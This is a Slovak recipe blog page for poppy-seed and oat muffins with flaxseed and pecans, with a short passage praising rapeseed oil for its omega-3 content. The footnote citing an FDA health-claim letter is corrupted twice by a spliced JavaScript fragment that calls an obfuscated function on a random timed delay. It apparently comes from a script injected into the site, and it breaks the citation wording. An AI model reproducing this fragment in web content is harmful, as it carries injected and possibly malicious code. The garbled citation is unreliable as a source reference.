Makovo-ovsené muffiny s ľanovými semiačkami

Často hovorím – vďaka Bohu za lásku k pečeniu. Mám veľmi rada čas, keď premýšľam o nových receptoch a ich kombináciách. A vďaka pečeniu celý môj byt vonia krásne. Na pečenie muffinov a iných mojich obľúbených koláčov často používam často repkový olej. Je to jeden zo spôsobov ako aj do pečenia prepašovať zdravé tuky. V repkovom oleji prítomná kyselina ALA prispieva k udržaniu normálnej hladiny cholesterolu v krvi. Stačia už dva gramy tejto živiny denne. Bez ohľadu na to, či používam rafinovaný alebo za studena lisovaný olej, každý typ obsahuje aj vysoké množstvo omega -3 mastných kyselín. Mali by sme ich konzumovať denne, stačia len dve polievkové lyžice repkového oleja (1). Nasledujúci recept je fantastický aj v tom, pretože poskytuje omega-3 mastné kyseliny aj vďaka semiačkam a orechom.

Ingrediencie

  • ½ hrnčeka mletého maku
  • ½ hrnčeka trstinového cukru
  • 1/2 hrnčeka pomletých ovsených vločiek
  • 1 hrnček hladkej špaldovej múky
  • 1 čl sódy bikarbóny
  • 1 kl mletej sušenej vanilky
  • štipka soli
  • 2 pl ľanových semiačok
  • 2 vajcia
  • 1 hrnček mlieka
  • 6 pl repkového oleja alebo roztopeného masla
  • 12 pekanových orechov

Postup

  1. Do jednej misky si pripravíme suché ingrediencie. Mak pomelieme s cukrom na elektrickom kávovom mlynčeku. A do druhej misky všetky mokré ingrediencie.
  2. Suché opatrne vsypeme do mokrých a krátko premiešame, aby nám vznikla kompaktná hmota. Naberačkou na zmrzlinu dávkujeme do papierových košíkov v muffinovej forme až po okraj, ozdobíme pekanovým orechom, alebo posypeme celým makom a dáme piecť do vyhriatej rúry na 200 stupňov asi 20 minút.
  3. Upečené muffiny vyberieme v papierových košíčkoch na rošt, aby vychladli.

TIP: Muffiny môžete plniť aj skaramelizovaným salkom zmiešaným s 1 pl ryžovej múky. Alebo skaramelizované salko použite ako polevu na hotové muffiny.


(1) Qualified Health Claims: Letter of Enforcement Discretion – Unsaturated Fatty Acids from Canola Oil andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Reduced Risk of
Coronary Heart Disease (Docket No. 2006Q-0091), Food andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Drug Administration, October 6, 2006

enjoy logo_jpglogo-zamiluj sa

 

logotypy_pasik_SK2verzia

Ohodnoť Recept

Napíš Koment